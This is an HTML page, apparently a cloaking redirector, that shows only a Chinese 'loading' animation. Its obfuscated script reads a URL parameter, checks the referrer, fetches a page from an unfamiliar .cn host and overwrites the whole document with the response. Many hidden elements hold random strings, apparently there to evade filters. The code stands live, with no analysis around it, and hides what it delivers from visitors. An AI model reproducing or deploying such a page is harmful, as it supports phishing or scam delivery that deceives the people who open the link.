<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YD6knUN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YD6knUN .TZoqdO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YD6knUN .content {
            line-height: 50px;
            text-align: center
        }

        .YD6knUN .img {
            width: 100%
        }

        .YD6knUN .bvUUVH {
            text-align: center
        }

        .YD6knUN .bvUUVH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YD6knUN .bvUUVH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YD6knUN .bvUUVH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YD6knUN .bvUUVH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YD6knUN .bvUUVH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YD6knUN .bvUUVH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YD6knUN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yf2sIPW2KW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ThDSZ = yf2sIPW2KW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ThDSZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ThDSZ +".html?a=share";
		}
		
        gJFZ4ycSu=url+"#"+new Date().getTime();
        gJFZ4ycSu && function() {
            $.get(gJFZ4ycSu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>fqTjUiFf6adTL6BKkOFhAhjsDd0iy0aK9W0IIJJQ</a>
<li style='display:none' >AP8wSWJspyKd99nPQ0vlA1t4FIMEprHTiwlJbSDdafW53rUjYblUo6C</li>
<img  src='' style='display:none'>
<p  style='display:none'>olifOgrg8yY1aK6BvZISwTbzDR2x6zzWo</p>
<li style='display:none' >AP8wSWJspyKd99nPQ0vlA1t4FIMEprHTiwlJbSDdafW53rUjYblUo6C</li>
<h1 style='display:none' >BjIum5Ys3CIvMwJXZLKlerLS7m7OwWglgBTiPeb4MDOZFNQoLJP7IwTtnj7J8YB13JEU3O2OI5otZg9q</h1>
<b style='display:none' >yMbX52XYZfPejiQ4C</b><div class="YD6knUN">
    <div class="TZoqdO">
        <div class="bvUUVH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >KnjlMOhgArKUc6zajA1ma3FQNC5uXzqkvHFnhZcCC4gZI3HXNWcGcw3Wgqm4Za6mjLa1Gp</h1>
<span style='display:none'>TpVoAEAchvbQwGvaiGah</span>
<ul style='display:none' >uCbR8ORockYJq1UdyErdIRdbw1GgmfIzDvXMeRs</ul>
<p  style='display:none'>yc0kByqdNuZl2xHbKtXYXkKz5Hx</p>
<ul style='display:none' >uCbR8ORockYJq1UdyErdIRdbw1GgmfIzDvXMeRs</ul>
<span style='display:none'>TpVoAEAchvbQwGvaiGah</span></body>
</html>